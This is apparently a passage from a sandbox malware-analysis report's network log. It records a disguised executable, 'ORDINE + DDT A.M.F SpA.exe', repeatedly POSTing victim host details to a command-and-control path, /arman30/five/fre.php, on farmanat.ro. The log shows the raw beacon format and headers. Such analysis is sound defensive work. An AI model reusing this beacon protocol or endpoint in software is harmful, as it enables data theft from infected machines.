                                              Nov 25, 2021 10:52:39.176614046 CET7052OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:39.230204105 CET7052INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              531192.168.11.2050375176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:39.619721889 CET7053OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:39.653296947 CET7053OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:39.732794046 CET7053INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              532192.168.11.2050376176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:40.167311907 CET7054OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:40.200833082 CET7054OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:40.250220060 CET7055INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              533192.168.11.2050377176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:40.668286085 CET7055OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:40.702511072 CET7056OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:40.755194902 CET7056INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              534192.168.11.2050378176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:41.168891907 CET7057OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:41.203107119 CET7057OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:41.253366947 CET7057INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              535192.168.11.2050379176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:41.613993883 CET7058OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:41.647304058 CET7058OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:41.702423096 CET7059INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              536192.168.11.2050380176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:42.127399921 CET7059OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:42.161623955 CET7060OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:42.215949059 CET7060INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              537192.168.11.2050381176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:42.627468109 CET7061OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:42.661046028 CET7061OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:42.715389967 CET7061INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              538192.168.11.2050382176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:43.136375904 CET7062OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:43.170875072 CET7062OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:43.228360891 CET7063INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              539192.168.11.2050383176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:43.624345064 CET7063OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:43.658546925 CET7064OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:43.713879108 CET7064INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              54192.168.11.2049890176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:36.204633951 CET6384OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:36.238786936 CET6385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:36.296611071 CET6385INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              540192.168.11.2050384176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:44.069422960 CET7065OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:44.103107929 CET7065OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:44.152900934 CET7065INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              541192.168.11.2050385176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:44.502012014 CET7066OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:44.535923004 CET7066OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:44.604295015 CET7067INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              542192.168.11.2050386176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:45.027630091 CET7067OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:45.061568022 CET7068OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:45.121598959 CET7068INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              543192.168.11.2050387176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:45.511486053 CET7069OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:45.545258999 CET7069OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:45.601075888 CET7069INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              544192.168.11.2050388176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:46.026917934 CET7070OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:46.060653925 CET7070OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:46.110552073 CET7071INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              545192.168.11.2050389176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:46.539469004 CET7071OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:46.573848009 CET7072OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:46.624283075 CET7072INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              546192.168.11.2050390176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:47.049388885 CET7073OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:47.083055019 CET7073OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:47.133569956 CET7073INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              547192.168.11.2050391176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:47.487560034 CET7074OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:47.521631002 CET7074OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:47.595679998 CET7075INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              548192.168.11.2050392176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
